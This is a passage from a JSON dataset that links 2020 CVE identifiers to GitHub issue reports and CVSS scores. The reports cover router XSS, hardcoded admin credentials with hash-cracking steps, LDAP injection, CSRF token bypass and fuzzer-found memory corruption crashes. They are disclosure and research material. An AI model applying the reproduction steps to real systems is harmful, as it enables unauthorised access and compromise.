  60367. "description": "CVETAG beetel Moderm NUMBERTAG r1 \u2014 Cross Site Scripting on the beetel NUMBERTAG r1 via the Ping Diagnostic. Exploit Title: beetel Moderm NUMBERTAG r1 \u2014 Cross Site Scripting on the beetel NUMBERTAG r1 via the Ping Diagnostic Date NUMBERTAG Exploit Author: VIVEK PANDAY Version: Firmware Version APITAG NUMBERTAG R1 Tested on Windows NUMBERTAG Linkedln Contact: URLTAG CVETAG APITAG site scripting] (XSS) Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk. APITAG To Reproduce NUMBERTAG Login to your router NUMBERTAG After signing NUMBERTAG Select for Maintance Mode NUMBERTAG Go to Ping Diagnostic option NUMBERTAG In the host Name field, enter any of these payloads: APITAG alert APITAG APITAG",
  60368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60369. "severity": "MEDIUM",
  60370. "baseScore": 5.4,
  60371. "impactScore": 2.7,
  60372. "exploitabilityScore": 2.3
  60373. },
  60374. {
  60375. "CVE_ID": "CVE-2020-36062",
  60376. "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/3",
  60377. "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/3",
  60378. "Repo_new": "vivekpanday12/cve-",
  60379. "Issue_Created_At": "2022-01-23T14:55:24Z",
  60380. "description": "CVE NUMBERTAG Dairy Farm Shop Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Dairy Farm Shop Management System \u00a0\u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Date NUMBERTAG Exploit Author: VIVEK PANDAY \u00a0 \u00a0 Vendor Homepage: FILETAG Software Link: URLTAG Version NUMBERTAG Tested on: Windows NUMBERTAG Linkedln Contact: URLTAG CVE NUMBERTAG Hardcoded Credentials:] Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from\u00a0 URLTAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper. APITAG use a strong encryption algorithm like SHA NUMBERTAG with APITAG use default credentials always change during installation time",
  60381. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60382. "severity": "CRITICAL",
  60383. "baseScore": 9.8,
  60384. "impactScore": 5.9,
  60385. "exploitabilityScore": 3.9
  60386. },
  60387. {
  60388. "CVE_ID": "CVE-2020-36064",
  60389. "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/2",
  60390. "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/2",
  60391. "Repo_new": "vivekpanday12/cve-",
  60392. "Issue_Created_At": "2022-01-23T14:03:54Z",
  60393. "description": "CVETAG Online Course Registration \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Online Course Registration \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Date NUMBERTAG Exploit Author: VIVEK PANDAY \u00a0 Vendor Homepage: FILETAG Software Link: FILETAG Version NUMBERTAG Tested on Windows NUMBERTAG Linkedln Contact: URLTAG \u00a0 CVETAG Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from\u00a0 FILETAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.",
  60394. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60395. "severity": "CRITICAL",
  60396. "baseScore": 9.8,
  60397. "impactScore": 5.9,
  60398. "exploitabilityScore": 3.9
  60399. },
  60400. {
  60401. "CVE_ID": "CVE-2020-36066",
  60402. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/195",
  60403. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/195",
  60404. "Repo_new": "tidwall/gjson",
  60405. "Issue_Created_At": "2020-12-23T07:10:22Z",
  60406. "description": "APITAG can cause APITAG attacks in specific input scenarios. The following POC can cause redos.. func APITAG { APITAG := APITAG APITAG APITAG }",
  60407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60408. "severity": "HIGH",
  60409. "baseScore": 7.5,
  60410. "impactScore": 3.6,
  60411. "exploitabilityScore": 3.9
  60412. },
  60413. {
  60414. "CVE_ID": "CVE-2020-36067",
  60415. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/196",
  60416. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/196",
  60417. "Repo_new": "tidwall/gjson",
  60418. "Issue_Created_At": "2020-12-24T02:40:47Z",
  60419. "description": "panic: runtime error: slice bounds out of range. URLTAG",
  60420. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60421. "severity": "HIGH",
  60422. "baseScore": 7.5,
  60423. "impactScore": 3.6,
  60424. "exploitabilityScore": 3.9
  60425. },
  60426. {
  60427. "CVE_ID": "CVE-2020-36079",
  60428. "Issue_Url_old": "https://github.com/zenphoto/zenphoto/issues/1292",
  60429. "Issue_Url_new": "https://github.com/zenphoto/zenphoto/issues/1292",
  60430. "Repo_new": "zenphoto/zenphoto",
  60431. "Issue_Created_At": "2021-02-28T15:14:45Z",
  60432. "description": "CVETAG clarification needed. CVETAG URLTAG vulnerability description is: CODETAG Am I correct that this is not a vulnerability and needs admin privileges (or special permissions for regular users) and that the software is intended to behave in this manner?",
  60433. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  60434. "severity": "HIGH",
  60435. "baseScore": 7.2,
  60436. "impactScore": 5.9,
  60437. "exploitabilityScore": 1.2
  60438. },
  60439. {
  60440. "CVE_ID": "CVE-2020-36120",
  60441. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/143",
  60442. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/143",
  60443. "Repo_new": "saitoha/libsixel",
  60444. "Issue_Created_At": "2020-12-30T04:12:13Z",
  60445. "description": "stack buffer overflow in sixel_encoder_encode_bytes at APITAG Version Libsixel NUMBERTAG Ubuntu NUMBERTAG LTS I fuzzed the sixelapi ERRORTAG Please use the following method to compile the attached cc file and run APITAG FILETAG Because uploading the zip failed,I switched to a txt file,please download the attachment and modify the suffix to cc ERRORTAG",
  60446. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60447. "severity": "HIGH",
  60448. "baseScore": 7.5,
  60449. "impactScore": 3.6,
  60450. "exploitabilityScore": 3.9
  60451. },
  60452. {
  60453. "CVE_ID": "CVE-2020-36123",
  60454. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/144",
  60455. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/144",
  60456. "Repo_new": "saitoha/libsixel",
  60457. "Issue_Created_At": "2020-12-31T01:11:15Z",
  60458. "description": "APITAG double free in in sixel_chunk_destroy PATHTAG img2sixel NUMBERTAG configured with: libcurl: no libpng: yes libjpeg: no gdk pixbuf2: no GD: no compiled with : APITAG run APITAG FILETAG ERRORTAG",
  60459. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60460. "severity": "HIGH",
  60461. "baseScore": 8.8,
  60462. "impactScore": 5.9,
  60463. "exploitabilityScore": 2.8
  60464. },
  60465. {
  60466. "CVE_ID": "CVE-2020-36144",
  60467. "Issue_Url_old": "https://github.com/getredash/redash/issues/5426",
  60468. "Issue_Url_new": "https://github.com/getredash/redash/issues/5426",
  60469. "Repo_new": "getredash/redash",
  60470. "Issue_Created_At": "2021-03-14T02:16:09Z",
  60471. "description": "LDAP Injection . I've tried to contact the security team through APITAG but had no response. I'm attaching the CVE contents for a proper fix. Suggested description > Redash is affected by LDAP Injection. There is an authentication > bypass and information leak through the crafting of special queries, > escaping the provided template because the ldap_user = > APITAG APITAG > auth_ldap_user(username, password) APITAG % > {\"username\": username} code lacks sanitization. Additional Information > I sent an email to the organization through security APITAG (specified in URLTAG NUMBERTAG days ago and haven't got a reply yet. > Repo link: URLTAG APITAG Other > CVETAG : LDAP Injection Affected Component > PATHTAG > > (line NUMBERTAG ldap_user = APITAG APITAG > (line NUMBERTAG def auth_ldap_user(username, password) > (line NUMBERTAG APITAG % {\"username\": username}, Attack Type > Remote Impact Escalation of Privileges > true Impact Information Disclosure > true Attack Vectors > To exploit this vulnerability, the LDAP Authentication must be enabled, and an attacker has to craft a query escaping the template. > > Entry Point: ldap_user = APITAG APITAG (line NUMBERTAG Since there is no sanitization when it arrives to the actual search function from LDAP (line NUMBERTAG an special crafted query can bypass the authentication and exfiltrate information. Reference > URLTAG > URLTAG > URLTAG",
  60472. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  60473. "severity": "MEDIUM",
  60474. "baseScore": 5.3,
  60475. "impactScore": 1.4,
  60476. "exploitabilityScore": 3.9
  60477. },
  60478. {
  60479. "CVE_ID": "CVE-2020-36148",
  60480. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/138",
  60481. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/138",
  60482. "Repo_new": "hoene/libmysofa",
  60483. "Issue_Created_At": "2020-08-26T16:00:48Z",
  60484. "description": "NULL pointer dereference in APITAG . Opening maliciously crafted file with mysofa_open leads to crash of the application. NULL pointer dereference in APITAG APITAG on variable attr >value causes segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault. > __strcmp_sse2_unaligned () at PATHTAG APITAG report on crash: ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG bf6b NUMBERTAG e bp NUMBERTAG fff NUMBERTAG sp NUMBERTAG fff NUMBERTAG a NUMBERTAG T NUMBERTAG f NUMBERTAG bf6b NUMBERTAG d ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in mysofa_loudness PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
  60485. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60486. "severity": "MEDIUM",
  60487. "baseScore": 6.5,
  60488. "impactScore": 3.6,
  60489. "exploitabilityScore": 2.8
  60490. },
  60491. {
  60492. "CVE_ID": "CVE-2020-36149",
  60493. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/137",
  60494. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/137",
  60495. "Repo_new": "hoene/libmysofa",
  60496. "Issue_Created_At": "2020-08-26T15:56:07Z",
  60497. "description": "NULL pointer dereference in APITAG Opening maliciously crafted file with mysofa_open leads to crash of the application. NULL pointer dereference in APITAG APITAG on variable attr >value causes segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault. > __strcmp_sse2_unaligned () at PATHTAG APITAG report on crash: ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fec7bf NUMBERTAG e bp NUMBERTAG ffee7ed NUMBERTAG sp NUMBERTAG ffee7ed NUMBERTAG T NUMBERTAG fec7bf NUMBERTAG d ( PATHTAG NUMBERTAG d6 in APITAG PATHTAG NUMBERTAG dc9 in APITAG PATHTAG NUMBERTAG dc9 in mysofa_tocartesian PATHTAG NUMBERTAG ea7 in mysofa_open_default PATHTAG NUMBERTAG ea7 in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG fec7b5ed NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
  60498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60499. "severity": "MEDIUM",
  60500. "baseScore": 6.5,
  60501. "impactScore": 3.6,
  60502. "exploitabilityScore": 2.8
  60503. },
  60504. {
  60505. "CVE_ID": "CVE-2020-36150",
  60506. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/135",
  60507. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/135",
  60508. "Repo_new": "hoene/libmysofa",
  60509. "Issue_Created_At": "2020-08-26T13:10:12Z",
  60510. "description": "Heap buffer overflow in loudness. Opening maliciously crafted file with mysofa_open leads to crash of the application. Heap buffer overread by NUMBERTAG bytes in APITAG ( PATHTAG ) cause segmentation fault. Message from gdb: > Program received signal SIGSEGV, Segmentation fault NUMBERTAG fcdc in loudness (in NUMBERTAG size NUMBERTAG at PATHTAG NUMBERTAG res += in in; > APITAG report on crash: > ASAN:SIGSEG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d NUMBERTAG pc NUMBERTAG f bp NUMBERTAG ea6 sp NUMBERTAG fffe NUMBERTAG a NUMBERTAG f8 T NUMBERTAG e in loudness PATHTAG NUMBERTAG b6a2 in mysofa_loudness PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG e NUMBERTAG in mysofa_open PATHTAG NUMBERTAG d4 in main libmysofa APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start (libmysofa APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Affected versions: master NUMBERTAG earlier versions have not been tested yet)",
  60511. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60512. "severity": "MEDIUM",
  60513. "baseScore": 6.5,
  60514. "impactScore": 3.6,
  60515. "exploitabilityScore": 2.8
  60516. },
  60517. {
  60518. "CVE_ID": "CVE-2020-36151",
  60519. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/134",
  60520. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/134",
  60521. "Repo_new": "hoene/libmysofa",
  60522. "Issue_Created_At": "2020-08-25T18:42:17Z",
  60523. "description": "Heap buffer overflow in mysofa_resampler_reset_mem. Opening a malicious file with mysofa_open leads to a crash of the application. The heap buffer overflow is caused by zeroing a memory block of size NUMBERTAG (cast to unsigned) in mysofa_resampler_reset_mem APITAG APITAG report on crash NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fbfc at pc NUMBERTAG f9a NUMBERTAG bec bp NUMBERTAG fffc1d NUMBERTAG sp NUMBERTAG fffc1d NUMBERTAG ae8 WRITE of size NUMBERTAG at NUMBERTAG fbfc thread T NUMBERTAG f9a NUMBERTAG beb in __asan_memset ( PATHTAG NUMBERTAG d in mysofa_resampler_reset_mem PATHTAG NUMBERTAG bfc4 in mysofa_resample PATHTAG NUMBERTAG a NUMBERTAG in mysofa_open_default PATHTAG NUMBERTAG a NUMBERTAG in mysofa_open PATHTAG NUMBERTAG c0a in main APITAG NUMBERTAG f9a NUMBERTAG f3e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY *easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy);",
  60524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60525. "severity": "MEDIUM",
  60526. "baseScore": 6.5,
  60527. "impactScore": 3.6,
  60528. "exploitabilityScore": 2.8
  60529. },
  60530. {
  60531. "CVE_ID": "CVE-2020-36152",
  60532. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/136",
  60533. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/136",
  60534. "Repo_new": "hoene/libmysofa",
  60535. "Issue_Created_At": "2020-08-26T15:33:36Z",
  60536. "description": "Stack buffer overflow in APITAG Incorrect use of sprintf on a too small buffer leads to a stack buffer overflow by NUMBERTAG bytes in APITAG This can lead to overwriting the next variable on the stack and logic errors in the application or crash in case of strong stack protection. GDB stacktrace NUMBERTAG ce in sprintf (__fmt NUMBERTAG APITAG __s NUMBERTAG fffffffcab0 \"REF NUMBERTAG at PATHTAG NUMBERTAG APITAG APITAG APITAG dt=dt APITAG ds=ds APITAG at PATHTAG NUMBERTAG c4b in APITAG (reader NUMBERTAG fffffffd NUMBERTAG da NUMBERTAG fffffffcb NUMBERTAG dt NUMBERTAG fffffffcb NUMBERTAG ds NUMBERTAG fffffffcbb0, dim=dim APITAG at PATHTAG NUMBERTAG dc4 in APITAG APITAG da=da APITAG dt=dt APITAG ds=ds APITAG at PATHTAG NUMBERTAG aa7 in APITAG APITAG dataobject NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG in APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e5 in APITAG (end NUMBERTAG dataobject=<optimized out>, reader NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG APITAG (dataobject=<optimized out>, reader NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG APITAG APITAG APITAG end_of_messages NUMBERTAG at PATHTAG NUMBERTAG e7 in APITAG APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG dataobject NUMBERTAG fffffffd NUMBERTAG dataobject NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG c9 in APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG ef in APITAG APITAG APITAG name=name APITAG at PATHTAG NUMBERTAG ebde in APITAG APITAG APITAG at PATHTAG NUMBERTAG f6ab in APITAG APITAG APITAG at PATHTAG NUMBERTAG bb6c in mysofa_load APITAG APITAG err=err APITAG at PATHTAG NUMBERTAG d NUMBERTAG in mysofa_open_default APITAG neighbor_angle_step NUMBERTAG APITAG err NUMBERTAG fffffffd NUMBERTAG filterlength NUMBERTAG fffffffd NUMBERTAG samplerate=<optimized out>, filename NUMBERTAG fffffffdb NUMBERTAG APITAG at PATHTAG NUMBERTAG mysofa_open (filename NUMBERTAG fffffffdb NUMBERTAG APITAG APITAG APITAG err=err APITAG at PATHTAG 
NUMBERTAG d5 in main (argc NUMBERTAG arg NUMBERTAG fffffffd NUMBERTAG at APITAG File triggering crash (unzip before test): FILETAG Code snippet for reproduction: > int filter_length; > int err; > struct MYSOFA_EASY easy = NULL; > easy = mysofa_open(filename NUMBERTAG filter_length, &err); > APITAG %p err: %d \", easy, err); > mysofa_close(easy); Solution: Make the number buffer larger, use snprintf with the size of the number buffer and check the value returned by snprintf!",
  60537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60538. "severity": "HIGH",
  60539. "baseScore": 8.8,
  60540. "impactScore": 5.9,
  60541. "exploitabilityScore": 2.8
  60542. },
  60543. {
  60544. "CVE_ID": "CVE-2020-36179",
  60545. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/3004",
  60546. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/3004",
  60547. "Repo_new": "fasterxml/jackson-databind",
  60548. "Issue_Created_At": "2021-01-01T01:03:14Z",
  60549. "description": "Block one more DBCP related potential gadget class. (note: placeholder until verified) One gadget type related to Apache DBCP NUMBERTAG was reported as possible gadget type and should be blocked (it may or may not allow vuln on its own). See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: [not yet allocated] Fix will be included in NUMBERTAG usable via jackson bom version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  60550. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60551. "severity": "HIGH",
  60552. "baseScore": 8.1,
  60553. "impactScore": 5.9,
  60554. "exploitabilityScore": 2.2
  60555. },
  60556. {
  60557. "CVE_ID": "CVE-2020-36183",
  60558. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/3003",
  60559. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/3003",
  60560. "Repo_new": "fasterxml/jackson-databind",
  60561. "Issue_Created_At": "2021-01-01T00:43:41Z",
  60562. "description": "Block one more gadget type (xxx, CVE to be allocated). Another gadget type(s) reported regarding class(es) of [to be added] library. See URLTAG for description of the general problem. Reporter(s): (to be added) Mitre id: [not yet allocated] Note: derivative of NUMBERTAG embedded Xalan) Fix will be included in NUMBERTAG usable via jackson bom version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  60563. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60564. "severity": "HIGH",
  60565. "baseScore": 8.1,
  60566. "impactScore": 5.9,
  60567. "exploitabilityScore": 2.2
  60568. },
  60569. {
  60570. "CVE_ID": "CVE-2020-36191",
  60571. "Issue_Url_old": "https://github.com/jupyterhub/jupyterhub/issues/3304",
  60572. "Issue_Url_new": "https://github.com/jupyterhub/jupyterhub/issues/3304",
  60573. "Repo_new": "jupyterhub/jupyterhub",
  60574. "Issue_Created_At": "2020-12-11T02:02:14Z",
  60575. "description": "Anti-CSRF token is not working in the Admin panel. Bug description In the APITAG Admin panel, the _xsrf token is not enforced for the add/delete user features. The current mechanism protecting the add/delete user features against CSRF relies solely on checking the Referer header value. Although the current Referer header check seems strict enough, it could still be bypassed if the user is tricked into installing a malicious browser plugin or if any bypass technique exists. Expected behaviour Implement anti-CSRF techniques like Double Submit Cookie, so that APITAG can prevent CSRF attacks. Actual behaviour Even if the _xsrf token is removed, the add/delete user requests are still accepted & processed by the server. That could lead to a possible CSRF attack. Screen Capture of successfully adding a user without _xsrf token FILETAG Screen Capture of successfully deleting a user without _xsrf token FILETAG How to reproduce NUMBERTAG Log in to the APITAG console with admin privileges NUMBERTAG Click the Control Panel button NUMBERTAG Click the Admin tab NUMBERTAG Click the Add User button / Delete User button NUMBERTAG Use a proxy to intercept the request sent NUMBERTAG Modify the request by removing the _xsrf token NUMBERTAG Send the request & see that it is accepted Your personal set up OS: Kubernetes NUMBERTAG Helm charts NUMBERTAG ubi NUMBERTAG Version(s): APITAG NUMBERTAG Python NUMBERTAG",
  60576. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N",
  60577. "severity": "MEDIUM",
  60578. "baseScore": 4.5,
  60579. "impactScore": 3.6,
  60580. "exploitabilityScore": 0.9
  60581. },
  60582. {
  60583. "CVE_ID": "CVE-2020-36192",
  60584. "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/344",
  60585. "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/344",
  60586. "Repo_new": "mantisbt-plugins/source-integration",
  60587. "Issue_Created_At": "2020-10-12T07:43:38Z",
  60588. "description": "An attacker can disclose the status of a private issue. Description This issue allows an attacker to disclose the current status of a private report by attaching it via the Attach Issues field. Assume you have successfully installed Source Integration; as the attacker, go to Repositories, go to Changesets, and look for the Attach Issues field. Assume you know the id of the private issue and insert it. Request CODETAG Response ERRORTAG By default the issue is not crossed out (if the issue was recently submitted/not modified). Click the Details button: it redirects to APITAG, where the attached issue is also included. In this case my issue was resolved, so the color indicator is green. If we click the issue it just returns Access Denied. At first I was unsure whether this is a default feature or not, but if this is not intended, please validate the type of issue (check whether the issue is public or private) before attaching it.",
  60589. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  60590. "severity": "MEDIUM",
  60591. "baseScore": 5.3,
  60592. "impactScore": 1.4,
  60593. "exploitabilityScore": 3.9
  60594. },
  60595. {
  60596. "CVE_ID": "CVE-2020-36193",
  60597. "Issue_Url_old": "https://github.com/pear/Archive_Tar/issues/35",
  60598. "Issue_Url_new": "https://github.com/pear/archive_tar/issues/35",
  60599. "Repo_new": "pear/archive_tar",
  60600. "Issue_Created_At": "2021-02-02T17:56:36Z",
  60601. "description": "relative symlinks APITAG of path file extraction) with new commit cde NUMBERTAG ff NUMBERTAG ERRORTAG b5b3ccb NUMBERTAG e9b NUMBERTAG de NUMBERTAG Hi, I've been trying to install twofactor_webauthn in APITAG but kept getting an error APITAG not extract app twofactor_webauthn\". APITAG doesn't seem to report the msg from the _error function in APITAG I'm not looking in the right place?), but I modified the _error function to log it to file and caught this problem: Out of path file extraction PATHTAG > PATHTAG That symlink is not out of path, so I'm not sure why it's failing. Here is a link to the tarball to investigate if desired: FILETAG And here is a link to the bug report on the APITAG app: URLTAG Thanks! Rick",
  60602. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  60603. "severity": "HIGH",
  60604. "baseScore": 7.5,
  60605. "impactScore": 3.6,
  60606. "exploitabilityScore": 3.9
  60607. },
  60608. {
  60609. "CVE_ID": "CVE-2020-36242",
  60610. "Issue_Url_old": "https://github.com/pyca/cryptography/issues/5615",
  60611. "Issue_Url_new": "https://github.com/pyca/cryptography/issues/5615",
  60612. "Repo_new": "pyca/cryptography",
  60613. "Issue_Created_At": "2020-12-09T15:02:20Z",
  60614. "description": "Fernet fails to encrypt/decrypt large data. Hello, Thank you for this fine library. I've been having some issues when encrypting large data APITAG using the Fernet class. There seems to be several failure modes, I've seen everything from a segfault, SIGABRT to the decrypted plaintext differing from the original plaintext. Please note that I've had some issues with the RAM on my computer (so that could potentially be the source of _some_ of the failures), but I've verified at least the SIGABRT failures on three different computers. It seems to me that the issue seems to be an integer overflow in APITAG but I'm not sure if Cryptography is at fault for passing an integer that is too large, or APITAG is at fault for not checking the integer, or a combination. If you think this should be fixed in APITAG please let me know how to best report the issue to them. Please see the attached script for more detailed information, as I think it speaks for itself NUMBERTAG Software versions: Python NUMBERTAG APITAG NUMBERTAG h cryptography NUMBERTAG cffi NUMBERTAG pip NUMBERTAG setuptools NUMBERTAG Installed cryptography through pip To reproduce: ERRORTAG",
  60615. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  60616. "severity": "CRITICAL",
  60617. "baseScore": 9.1,
  60618. "impactScore": 5.2,
  60619. "exploitabilityScore": 3.9
  60620. },
  60621. {
  60622. "CVE_ID": "CVE-2020-36244",
  60623. "Issue_Url_old": "https://github.com/GENIVI/dlt-daemon/issues/265",
  60624. "Issue_Url_new": "https://github.com/covesa/dlt-daemon/issues/265",
  60625. "Repo_new": "covesa/dlt-daemon",
  60626. "Issue_Created_At": "2020-11-02T18:38:23Z",
  60627. "description": "write heap buffer overflow in dlt_buffer_write_block. Hello, I have fuzzed dlt daemon to search for bugs using the Tool CI Fuzz. I think I found a write heap buffer overflow in the function dlt_buffer_write_block. You can find the full crash report below. This is from a fuzz test I wrote to execute the function dlt_buffer_push with fuzzer generated inputs. After having a look at the code it seems that there is no size check before writing to the ring buffer: There is no check if size APITAG size in dlt_buffer_write_block. As far as I can say this condition isn't checked elsewhere. Since buffer overflows can often be used to get arbitrary code execution this is a potential security issue. Using the dlt_daemon_client_send function a connected dlt user could write into the memory of the daemon and possibly gain arbitrary code execution. I think this could be fixed by changing the if condition in APITAG (in function dlt_buffer_push3) into a while loop. If you need further information or discussion I'm happy to help as far as I can NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG bp NUMBERTAG ffca5a NUMBERTAG a NUMBERTAG sp NUMBERTAG ffca5a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG f in __asan_memcpy PATHTAG NUMBERTAG fe NUMBERTAG a1c NUMBERTAG b in dlt_buffer_write_block PATHTAG NUMBERTAG fe NUMBERTAG a1cf7b9 in dlt_buffer_push3 PATHTAG 